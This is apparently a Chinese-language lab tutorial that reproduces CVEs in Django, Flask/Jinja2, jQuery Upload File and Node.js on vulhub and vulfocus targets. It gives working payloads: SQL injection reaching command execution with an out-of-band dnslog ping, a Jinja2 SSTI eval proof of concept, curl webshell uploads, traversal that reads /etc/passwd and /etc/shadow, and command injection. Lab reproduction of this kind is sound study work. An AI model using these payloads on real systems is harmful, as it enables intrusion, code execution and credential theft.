框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现

目录

• 服务攻防-框架安全&CVE复现&Django&Flask&Node.JS&JQuery漏洞复现
• • 中间件列表介绍
  • 常见语言开发框架
  • Python开发框架安全-Django&Flask漏洞复现
  • • Django开发框架
    • 漏洞复现
    • • [CVE-2019-14234（Django JSONField/HStoreField SQL注入漏洞）](#CVE-2019-14234（Django JSONField/HStoreField SQL注入漏洞）)
      • [CVE-2021-35042（Django QuerySet.order_by SQL注入漏洞）](#CVE-2021-35042（Django QuerySet.order_by SQL注入漏洞）)
    • [Flask Jinja2 SSTI](#Flask Jinja2 SSTI)
    • 漏洞复现
    • • [Flask（Jinja2） 服务端模板注入漏洞](#Flask（Jinja2） 服务端模板注入漏洞)
  • JavaScript开发框架安全-Jquery&Node漏洞复现
  • • jQuery框架
    • 漏洞复现
    • • [CVE_2018_9207-jQuery Upload File漏洞复现](#CVE_2018_9207-jQuery Upload File漏洞复现)
    • Node.js
    • 漏洞复现
    • • [Node.js 目录穿越漏洞（CVE-2017-14849）](#Node.js 目录穿越漏洞（CVE-2017-14849）)
      • [Node.js 命令执行 （CVE-2021-21315）](#Node.js 命令执行 （CVE-2021-21315）)

服务攻防-框架安全&CVE复现&Django&Flask&Node.JS&JQuery漏洞复现

中间件列表介绍

中间件及框架列表：

IIS，Apache，Nginx，Tomcat，Docker，K8s，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jetty，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery 等
1、开发框架-PHP-Laravel-Thinkphp

2、开发框架-Javaweb-St2-Spring

3、开发框架-Python-django-Flask

4、开发框架-Javascript-Node.js-JQuery

5、其他框架-Java-Apache Shiro&Apache Sorl

常见语言开发框架

PHP：Thinkphp Laravel YII CodeIgniter CakePHP Zend 等

JAVA：Spring MyBatis Hibernate Struts2 Springboot 等

Python：Django Flask Bottle Turbobars Tornado Web2py 等

Javascript：Vue.js Node.js Bootstrap JQuery Angular 等
常见中间件的安全测试：

1、配置不当-解析&弱口令

2、安全机制-特定安全漏洞

3、安全机制-弱口令爆破攻击

4、安全应用-框架特定安全漏洞
中间件安全测试流程：

1、判断中间件信息-名称&版本&三方

2、判断中间件问题-配置不当&公开漏洞

3、判断中间件利用-弱口令&EXP&框架漏洞
应用服务安全测试流程：

1、判断服务开放情况-端口扫描&组合应用等

2、判断服务类型归属-数据库&文件传输&通讯等

3、判断服务利用方式-特定漏洞&未授权&弱口令等
开发框架组件安全测试流程：

1、判断常见语言开发框架类型

2、判断开发框架存在的 CVE 问题

Python开发框架安全-Django&Flask漏洞复现

Django开发框架

介绍：django(Python Web 框架)详解

Django是一个高级的Python Web框架，可以快速开发安全和可维护的网站。由经验丰富的开发者构建，Django负责处理网站开发中麻烦的部分，可以专注于编写应用程序，而无需重新开发。它是免费和开源的，有活跃繁荣的社区，丰富的文档，以及很多免费和付费的解决方案。

Django 是一款广为流行的开源 web 框架，由 Python 编写，许多网站和 app 都基于

Django 开发。Django 采用了 MTV 的框架模式，即模型 M，视图 V 和模版 T，使用

Django，程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且

Django 还包含许多功能强大的第三方插件，使得 Django 具有较强的可扩展性。

安全问题：

CVE_2019_14234

CVE-2021-35042

...

漏洞复现

CVE-2019-14234（Django JSONField/HStoreField SQL注入漏洞）

该漏洞要求开发者使用 JSONField/HStoreField;此外，还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响，这为我们提供了一种重现漏洞的简单方法。

靶场：vulhub

参考：Django JSONField/HStoreField SQL注入漏洞复现

开启环境：

访问web界面：

首先，使用用户名和密码登录 Django-Admin。

http://your-ip:8000/admin/

账号：admin 密码：a123123123

成功登录：

然后转到模型的列表视图：

http://your-ip:8000/admin/vuln/collection/

Collection

添加到 GET 参数中，其中是 JSONField：

detail__a'b=123 detail

payload:

http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123

可以看到单引号注入成功，SQL语句报错：

创建 cmd_exec：

payload:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%
20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

执行效果：

成功创建

调用 cmd_exec 执行命令：

DNSlog获取地址

payload:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%
20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%20xxxx.dnslog.cn%27--%20

DNSlog回显效果：

CVE-2021-35042（Django QuerySet.order_by SQL注入漏洞）

该漏洞需要开发人员使用order_by功能。此外，还可以控制查询集的输入。

靶场：vulhub

参考：Django QuerySet.order_by SQL注入漏洞复现

开启环境：

访问web界面：

首先，转到列表视图并添加到 GET 参数。

payload:

http://your-ip:8000/vuln/order=-id

执行过后会看到按 id 降序排序的数据：

payload:
目录：
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat
(0x7e,(select%20@@basedir)),1)%23

版本：
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat
(0x7e,(select%20version())),1)%23

数据库名：
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat
(0x7e,(select%20database())),1)%23

可以看到单括号已经注入成功，可以从错误中获取信息。

查看目录:

爆版本号：

爆数据库名：

Flask Jinja2 SSTI

介绍：Flask详解

Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用

Werkzeug ，模板引擎则使用 Jinja2。Flask使用 BSD 授权。

Flask也被称为 "microframework" ，因为它使用简单的核心，用 extension 增加其他功能。Flask没有默认使用的数据库、窗体验证工具。

安全问题：

Flask（Jinja2） 服务端模板注入漏洞

...

漏洞复现

Flask（Jinja2） 服务端模板注入漏洞

靶场：vulhub

参考：Flask（Jinja2） 服务端模板注入漏洞复现

开启环境：

访问web界面：

接下来进行访问，http://your-ip/?name={``{123*123}}，得到15129这个结果，则说明SSTI漏洞存在。

获取eval函数并执行任意python代码的POC：

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

ps:需要进行url编码，编码过后直接通过GET请求，发送即可。

执行命令处，自定义像要执行的命令，查看的信息，每次更换命令都需要进行URL编码重新发送。

其他命令：ls，whoami

执行效果：

JavaScript开发框架安全-Jquery&Node漏洞复现

jQuery框架

介绍：jQuery详解

jQuery是一个快速、简洁的JavaScript框架，是继Prototype之后又一个优秀的JavaScript代码库（框架）于2006年1月由John Resig发布。jQuery设计的宗旨是"write Less，Do More"，即倡导写更少的代码，做更多的事情。它封装JavaScript常用的功能代码，提供一种简便的JavaScript设计模式，优化HTML文档操作、事件处理、动画设计和Ajax交互。

安全问题：

CVE_2018_9207

CVE_2018_9208

CVE_2018_9209

...

漏洞复现

CVE_2018_9207-jQuery Upload File漏洞复现

jQuery是一个快速、简洁的JavaScript框架，是继Prototype之后又一个优秀的JavaScript代码库（框架）于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file

靶场：vulfocus

开启靶场：

访问web界面：

访问框架引用目录结构：

/jquery-upload-file/

利用：

一条命令即可解决，访问并上传文件。

payload:
//访问网站，进行上传；前提是在文件夹下创建后门文件。
curl -F "myfile=@shell.php" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

curl -F "myfile=@cmd.php" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

上传shell.php：

上传cmd.php:

查看：

上传文件所在位置：(后门为php)

/jquery-upload-file/php/uploads/

验证，可否解析执行：

使用蚁剑连接：

连接成功

其他列出的安全问题，基本都差不多。

Node.js

详解：node.js详解

Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境，用于方便的搭建响应

速度快、易于拓展的网络应用。

Node.js对一些特殊用例进行优化，提供替代的API，使得V8在非浏览器环境下运行得更好，V8引擎执行Javascript的速度非常快，性能非常好，基于Chrome JavaScript运行时建立的平台， 用于方便地搭建响应速度快、易于扩展的网络应用

安全问题：

CVE_2021_21315

CVE_2017_14849

...

漏洞复现

Node.js 目录穿越漏洞（CVE-2017-14849）

Joyent Node.js是美国Joyent公司的一套建立在Google V8 JavaScript引擎之上的网络应用平台。该平台主要用于构建高度可伸缩的应用程序，以及编写能够处理数万条且同时连接到一个物理机的连接代码。 Joyent Node.js 8.6.0之前的8.5.0版本中存在安全漏洞。远程攻击者可利用该漏洞访问敏感文件。

漏洞原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误，导致向上层跳跃的时候（如../../../../../../etc/passwd），在中间位置增加foo/../（如../../../foo/../../../../etc/passwd），即可使normalize返回/etc/passwd，但实际上正确结果应该是../../../../../../etc/passwd。

express这类web框架，通常会提供了静态文件服务器的功能，这些功能依赖于normalize函数。比如，express在判断path是否超出静态目录范围时，就用到了normalize函数，上述BUG导致normalize函数返回错误结果导致绕过了检查，造成任意文件读取漏洞。

靶场：vulfocus

参考：CVE-2017-14849复现

开启环境：

访问web界面：

其中引用到了文件/static/main.js，说明其存在静态文件服务器。

构造请求：

通过GET请求发送以下数据包即可：
GET：
...
/static/../../../a/../../../../etc/passwd
...

完整数据包：

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: 192.168.100.134:56111
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

发送给重发器，然后再发送数据包过后：

（如果打开web界面抓包时，构造请求后，发包无法正常回显，状态码报错。可尝试删除cookie等相关信息，不然可能会无法正常回显，错误状态码。如果正常回显，就可以不用删除。）

效果：成功读取/etc/passwd文件

效果：成功读取/etc/shadow文件

Node.js 命令执行 （CVE-2021-21315）

Node.js-systeminformation是用于获取各种系统信息的Node.JS模块，它包含多种轻量级功能，可以检索详细的硬件和系统相关信息 npm团队发布安全公告，Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315），其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。

靶场：vulfocus

开启环境：

访问web界面：

构造GET请求：

payload：
/api/getServices?name[]=$(echo%20%27rumilc666%27%20>%20rumi.txt)

执行过后：

验证：

成功生成该文件

docker ps
docker exec -it id /bin/bash